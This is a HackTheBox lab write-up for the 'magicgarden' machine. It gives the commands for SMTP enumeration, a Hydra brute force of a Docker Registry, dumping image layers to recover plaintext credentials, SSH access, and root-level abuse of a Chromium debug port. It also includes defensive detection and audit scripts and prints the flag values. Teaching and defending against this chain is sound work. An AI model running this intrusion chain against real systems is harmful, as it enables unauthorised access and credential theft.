HTB: magicgarden Writeup


Machine Information

Attribute       Details
Name            magicgarden
OS              Linux
Difficulty      Insane
Points          N/A
Release Date    N/A
IP Address      10.129.10.73
Author          D3vnomi

Machine Rating

⭐⭐⭐⭐⭐ (9.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐⭐⭐
  • Real-world: ⭐⭐⭐⭐⭐
  • CVE: ⭐⭐⭐☆☆
  • CTF-like: ⭐⭐⭐⭐⭐

Summary

magicgarden is an Insane-difficulty Linux machine. The exploitation path involves initial enumeration and service discovery, gaining an initial foothold through the identified vulnerability, credential extraction for user access, and finally privilege escalation to root.

TL;DR: Enumeration → Foothold → User credentials → Privilege escalation → Root.


Reconnaissance

Port Scanning

    nmap -sC -sV -T4 -p- 10.129.10.73

Key services identified in the scan results:

  • Port 5000: Docker Registry
  • Port 25/587: SMTP (Postfix)
  • Web application ports with endpoints: /catalog, /check/, /login/

Service Enumeration

SMTP Enumeration with Metasploit:

    msfconsole
    use scanner/smtp/smtp_enum
    set RHOSTS 10.129.10.73
    exploit

Result: discovered the domains magicgardens.htb and magicgardens.magicgardens.htb.

    echo "10.129.10.73 magicgardens.htb magicgardens.magicgardens.htb" >> /etc/hosts

Initial Foothold

Docker Registry Brute Force

The Docker Registry on port 5000 was protected with HTTP basic authentication. Hydra was used to brute-force the credentials against the /v2/ endpoint:

    hydra -l alex -P rockyou.txt 10.129.10.73 -s 5000 http-get /v2/

Result: alex:diamonds
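From the defender's side, the pattern above (a burst of unauthenticated GETs against /v2/ answered with 401 until one succeeds) stands out in the access log of the reverse proxy or registry front end. The following is an added example, not part of the original writeup or of any tool it uses: it parses constructed nginx-style access-log lines (the source address 10.10.14.5, the timestamps and the byte counts are made up) and reports any source that exceeds a threshold of 401 responses on /v2/ within a sliding time window.

```python
"""Flag HTTP basic-auth brute force against a Docker Registry /v2/ endpoint.

Added example; the log lines, thresholds and addresses below are constructed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Common/combined log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: six failed attempts from one source in six seconds,
# a single stray 401 from another host, legitimate authenticated traffic,
# and finally a success from the brute-forcing source.
SAMPLE_LOG = """\
10.10.14.5 - - [08/Mar/2026:10:00:01 +0000] "GET /v2/ HTTP/1.1" 401 87
10.10.14.5 - - [08/Mar/2026:10:00:02 +0000] "GET /v2/ HTTP/1.1" 401 87
10.10.14.9 - - [08/Mar/2026:10:00:02 +0000] "GET /v2/ HTTP/1.1" 401 87
10.10.14.5 - - [08/Mar/2026:10:00:03 +0000] "GET /v2/ HTTP/1.1" 401 87
10.10.14.7 - alex [08/Mar/2026:10:00:04 +0000] "GET /v2/_catalog HTTP/1.1" 200 44
10.10.14.5 - - [08/Mar/2026:10:00:04 +0000] "GET /v2/ HTTP/1.1" 401 87
10.10.14.5 - - [08/Mar/2026:10:00:05 +0000] "GET /v2/ HTTP/1.1" 401 87
10.10.14.5 - - [08/Mar/2026:10:00:06 +0000] "GET /v2/ HTTP/1.1" 401 87
10.10.14.5 - alex [08/Mar/2026:10:00:07 +0000] "GET /v2/ HTTP/1.1" 200 2
""".splitlines()


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), path and status, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "path": m.group("path"),
        "status": int(m.group("status")),
    }


def find_bruteforce(lines, threshold=5, window_seconds=60, path_prefix="/v2/"):
    """Return {ip: {"first_flagged": iso_ts, "failures": n}} for sources that
    produce >= threshold 401 responses on path_prefix inside any window_seconds span.

    A per-source deque keeps only timestamps inside the sliding window, so a
    slow trickle of failures spread over a long time is not flagged.
    """
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)
    failures = defaultdict(int)
    flagged = {}
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["status"] != 401 or not ev["path"].startswith(path_prefix):
            continue
        ip = ev["ip"]
        failures[ip] += 1
        q = recent[ip]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:
            q.popleft()
        if len(q) >= threshold and ip not in flagged:
            flagged[ip] = {"first_flagged": ev["ts"].isoformat(), "failures": 0}
    # Fill in the total failure count now that the whole input has been read.
    for ip in flagged:
        flagged[ip]["failures"] = failures[ip]
    return flagged


if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['failures']} failed /v2/ logins, first flagged {info['first_flagged']}")
```

A successful 200 from a source that was flagged moments earlier (the last sample line) is the higher-value alert: it means the brute force worked and the credential should be rotated. Rate limiting or lockout on the proxy in front of the registry removes the problem at the source.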

Docker Registry Dump

Dumped all container images using DockerRegistryGrabber:

    python3 drg.py https://10.129.10.73 -U alex -P diamonds --dump_all

Critical Finding: db.sqlite3 was located in the dumped container layers; it contained the application database, including user credentials.
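The root cause here is that a populated application database was baked into an image layer, where anyone who can pull the image can read it. A pre-push check over the image's layer tarballs catches that class of mistake before it reaches a registry. The following is an added example, not tooling from the writeup or the target project: it scans tar members for file names that should never ship in an image. The sample layer is built in memory (paths and contents constructed) so the check runs offline; against a real image you would feed it the layer tarballs from `docker save`.

```python
"""Scan Docker image layer tarballs for files that should not ship in an image.

Added example; the sample layer built below is constructed, not taken from the
target image.
"""
import io
import re
import tarfile

# Patterns for artefacts that routinely leak credentials or session material.
SENSITIVE = [
    (re.compile(r"\.(sqlite3?|db)$"), "database file"),
    (re.compile(r"(^|/)\.env(\..*)?$"), "dotenv file"),
    (re.compile(r"(^|/)id_(rsa|ed25519|ecdsa)$"), "ssh private key"),
    (re.compile(r"\.(pem|key)$"), "key material"),
    (re.compile(r"(^|/)\.(bash|zsh)_history$"), "shell history"),
]


def normalise(name):
    """Strip the leading './' that image layers usually carry on member names."""
    return name[2:] if name.startswith("./") else name


def scan_layer(layer_bytes):
    """Return [(path, label, size)] for regular files in the layer matching SENSITIVE."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:*") as tf:
        for member in tf:
            if not member.isfile():
                continue
            path = normalise(member.name)
            for pattern, label in SENSITIVE:
                if pattern.search(path):
                    findings.append((path, label, member.size))
                    break
    return findings


def scan_layers(layers):
    """Scan several layers; returns findings tagged with the layer index."""
    return [(idx, *f) for idx, blob in enumerate(layers) for f in scan_layer(blob)]


def build_sample_layer():
    """Constructed layer: a Django-style app with its database and .env left in."""
    files = {
        "./app/manage.py": b"# django entrypoint\n",
        "./app/db.sqlite3": b"SQLite format 3\x00" + b"\x00" * 100,
        "./app/.env": b"SECRET_KEY=placeholder-not-a-real-key\n",
        "./etc/hostname": b"web\n",
    }
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, data in files.items():
            info = tarfile.TarInfo(path)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


if __name__ == "__main__":
    for idx, path, label, size in scan_layers([build_sample_layer()]):
        print(f"layer {idx}: {path} ({label}, {size} bytes)")
```

Run as a CI gate, a non-empty result should fail the build. Name-based matching is deliberately cheap; pair it with content-based secret scanning for strings such as API keys that live inside otherwise innocuous files.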


User Compromise

Credential Discovery

Extracted credentials from the SQLite database found in the dumped Docker container:

    sqlite3 db.sqlite3
    sqlite> SELECT * FROM users;

Discovered User:

  • Username: morty
  • Password: jonasbrothers

SSH Access

Used the discovered credentials to gain SSH access:

    ssh morty@10.129.10.73

Enumeration with Linpeas:

    ./linpeas.sh

User Flag

    cat ~/user.txt

🚩 User Flag: 2f790bcb365ac2c6f4c9fd49d9cb44ae


Privilege Escalation

Chromium Debug Port Exploitation

During linpeas enumeration, a Chromium remote-debugging port was found listening on 127.0.0.1:47329, so it was reachable only from localhost.

SSH Port Forwarding:

    ssh -L 47329:127.0.0.1:47329 morty@10.129.10.73

Chrome DevTools Protocol (CDP) Exploitation

Accessed the debug port via Chrome DevTools Protocol to interact with the running Chromium instance:

    # Connect to the CDP endpoint at localhost:47329
    # Modified wsclient.js to issue:
    #   - Page.navigate to open root-restricted pages
    #   - Page.captureScreenshot to extract sensitive information

Critical Finding: because the Chromium process ran as root, it was possible to navigate it to restricted pages and capture screenshots containing sensitive data.

Note: a race condition meant several attempts were needed before the capture contained the root flag.
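The misconfiguration that makes this escalation possible is a browser started with remote debugging enabled under a privileged account; binding to loopback does not help on a multi-user host, because any local user (here, morty over an SSH tunnel) can reach the port. The following is an added example, not from the writeup: a host audit that correlates `ss -ltnp` style listener lines with `ps -eo user,pid,args` style process lines and reports every listener whose command line enables a DevTools debugging flag, graded by who owns it and where it is bound. The sample output is constructed to resemble the finding above (pids, paths and the registry process are made up).

```python
"""Audit a host for browser remote-debugging (Chrome DevTools Protocol) listeners.

Added example; SS_SAMPLE and PS_SAMPLE are constructed, not captured output.
"""
import re

# ss -ltnp line: State Recv-Q Send-Q Local:Port Peer:Port users:(("name",pid=N,fd=N))
SS_RE = re.compile(
    r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)'
)
# Any of Chromium's remote-debugging switches enables the DevTools endpoint.
DEBUG_FLAG = re.compile(r"--remote-debugging-(port|pipe|address)")

SS_SAMPLE = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22          0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      10     127.0.0.1:47329     0.0.0.0:*         users:(("chromium",pid=4471,fd=41))
LISTEN 0      4096   *:5000              *:*               users:(("registry",pid=1203,fd=7))
"""
PS_SAMPLE = """\
USER       PID COMMAND
root       812 /usr/sbin/sshd -D
root      4471 /usr/lib/chromium/chromium --headless --remote-debugging-port=47329 --user-data-dir=/root/.chromium
registry  1203 /usr/bin/registry serve /etc/docker/registry/config.yml
"""


def parse_listeners(ss_output):
    """Return [{addr, port, proc, pid}] for every LISTEN line ss attributed to a process."""
    out = []
    for line in ss_output.splitlines():
        m = SS_RE.match(line.strip())
        if m:
            out.append({"addr": m.group("addr"), "port": int(m.group("port")),
                        "proc": m.group("proc"), "pid": int(m.group("pid"))})
    return out


def parse_processes(ps_output):
    """Return {pid: {user, args}} from `ps -eo user,pid,args` output; header is skipped."""
    procs = {}
    for line in ps_output.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[1].isdigit():
            procs[int(parts[1])] = {"user": parts[0], "args": parts[2]}
    return procs


def is_loopback(addr):
    return addr.startswith("127.") or addr in ("[::1]", "localhost")


def find_debug_listeners(ss_output, ps_output):
    """Cross-reference listeners with processes; report those with a debugging flag.

    Severity: CRITICAL if reachable off-host, HIGH if loopback but root-owned
    (any local user inherits root's browser context), MEDIUM otherwise.
    """
    procs = parse_processes(ps_output)
    findings = []
    for lst in parse_listeners(ss_output):
        proc = procs.get(lst["pid"])
        if proc is None or not DEBUG_FLAG.search(proc["args"]):
            continue
        if not is_loopback(lst["addr"]):
            severity = "CRITICAL"
        elif proc["user"] == "root":
            severity = "HIGH"
        else:
            severity = "MEDIUM"
        findings.append({"severity": severity, "user": proc["user"], "pid": lst["pid"],
                         "addr": lst["addr"], "port": lst["port"], "args": proc["args"]})
    return findings


if __name__ == "__main__":
    for f in find_debug_listeners(SS_SAMPLE, PS_SAMPLE):
        print(f"[{f['severity']}] {f['user']} pid {f['pid']} listening on "
              f"{f['addr']}:{f['port']}: {f['args']}")
```

On a live host, feed it the real output of `ss -ltnp` and `ps -eo user,pid,args`. The fix is to run the browser under a dedicated unprivileged user and, where automation needs DevTools, prefer `--remote-debugging-pipe` (which has no socket for other users to connect to) over a TCP port.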

Root Flag

    cat /root/root.txt

🚩 Root Flag: d351155832212bc382a7b53a2069d0b5


Attack Chain Summary

graph TD
A["Reconnaissance: nmap scan"] --> B["SMTP Enumeration: Discover magicgardens.magicgardens.htb"]
B --> C["Docker Registry Brute Force: alex:diamonds"]
C --> D["DockerRegistryGrabber: Dump all container images"]
D --> E["Extract db.sqlite3: Find morty:jonasbrothers"]
E --> F["SSH Access: Connect as morty"]
F --> G["Linpeas Enumeration: Discover Chromium debug port"]
G --> H["SSH Port Forward: localhost:47329"]
H --> I["CDP Exploit: Run JavaScript via Chromium process"]
I --> J["Root Access: Capture root flag"]

Tools Used

Tool                       Purpose
nmap                       Port scanning and service fingerprinting
metasploit                 SMTP enumeration (smtp_enum scanner)
hydra                      Docker Registry brute-force attack
python3                    DockerRegistryGrabber script execution
sqlite3                    Database extraction and credential harvesting
ssh                        Secure shell access and port forwarding
linpeas                    Linux privilege escalation enumeration
Chrome DevTools Protocol   Chromium debug port exploitation

Key Learnings

  • Thorough enumeration is critical — every open port and service can be a potential entry point.
  • Configuration files and databases often contain credentials that enable lateral movement.
  • Privilege escalation frequently depends on misconfigurations rather than software vulnerabilities.

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.


Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Insane